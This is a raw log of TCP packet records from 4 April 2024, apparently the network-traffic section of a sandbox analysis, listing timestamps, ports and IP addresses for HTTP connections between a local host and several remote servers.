Apr 4, 2024 17:49:06.111397982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111438990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111443996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111495972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111534119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111546040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111592054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111685038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111721992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111751080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111773014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111793041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111814976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111860037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.111886024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111938000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.111978054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112003088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112071991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112114906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112132072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112353086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112366915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112385035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112396955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112405062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112437010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112441063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112479925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112518072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112543106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112581968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112598896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112611055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112649918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112668991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112732887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112771034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112797022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112839937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112853050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112878084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.112943888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.112982035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113007069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113059998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113101006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113142014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113179922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113219023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113246918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113287926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113325119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113377094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113434076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113471031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113483906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113538980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113586903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113621950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113686085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113723993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113749027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113811016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113882065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113922119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.113945961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.113985062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114025116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.114038944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114053011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114078999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.114109039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114131927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114149094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.114626884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114694118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114733934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.114741087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114799976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114837885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.114840031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114882946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.114918947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.194641113 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.204406977 CEST	80	49731	190.249.187.165	192.168.2.10
Apr 4, 2024 17:49:06.276988029 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.377640963 CEST	80	49732	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.377722979 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.378113031 CEST	49732	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.415410995 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.459198952 CEST	80	49733	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.459306955 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.460714102 CEST	49733	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.466197014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466212034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466248989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466269016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466345072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466362000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466375113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466398001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466434956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466438055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466438055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466449022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466468096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466525078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466536999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466559887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466603041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466624975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466635942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466837883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.466871977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.466995955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467009068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467020988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467032909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467046022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467060089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467067957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467076063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467098951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467109919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467205048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467242956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467263937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467276096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467298985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467313051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467672110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467684984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467699051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467709064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467710972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467730045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467741966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467746019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467755079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467771053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467781067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467791080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467827082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467895031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467906952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467919111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467927933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467953920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.467984915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.467998981 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468019009 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468046904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468060017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468070984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468082905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468094110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468117952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468214035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468235970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468274117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468339920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468374968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468404055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468416929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468427896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468458891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468646049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468691111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468725920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468753099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468765020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468787909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468800068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468822002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468822002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.468859911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.468899012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469170094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469203949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469247103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469263077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469276905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469310999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469381094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469403982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469439983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469475985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469495058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469527006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469547987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469563007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469579935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469611883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469651937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469686031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469693899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469716072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469748974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.469786882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469799042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.469831944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470004082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470037937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470072031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470096111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470109940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470149040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470429897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470464945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470483065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470521927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470550060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470562935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470585108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470594883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470618010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470633030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470732927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470745087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470756054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.470768929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470793962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.470964909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471008062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471020937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471044064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471045971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471101999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471132994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471144915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471180916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471245050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471257925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471297979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471357107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471370935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471410990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471482038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471524000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471628904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471661091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471668005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471692085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471728086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471745968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471760035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471772909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.471780062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471807003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.471968889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472088099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472100973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472111940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472142935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472146034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472158909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472161055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472225904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472359896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472404003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472440004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472470999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472527027 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472596884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472614050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472632885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472654104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472655058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472695112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472733021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472762108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472836018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472851038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472882986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472888947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472901106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472923994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.472935915 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472958088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.472985983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473009109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473093033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473105907 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473165035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473241091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473277092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473323107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473372936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473404884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473444939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473555088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473588943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473615885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473731995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473773956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473830938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473862886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.473911047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.473999023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474030018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474088907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474143982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474179983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474184990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474258900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474288940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474330902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474332094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474395037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474427938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474431038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474443913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474455118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474462986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474498034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474514961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474567890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474610090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474634886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474755049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474767923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474790096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474805117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474827051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474842072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474854946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474890947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.474908113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.474968910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475009918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.475043058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.475055933 CEST	80	49730	103.23.232.80	192.168.2.10
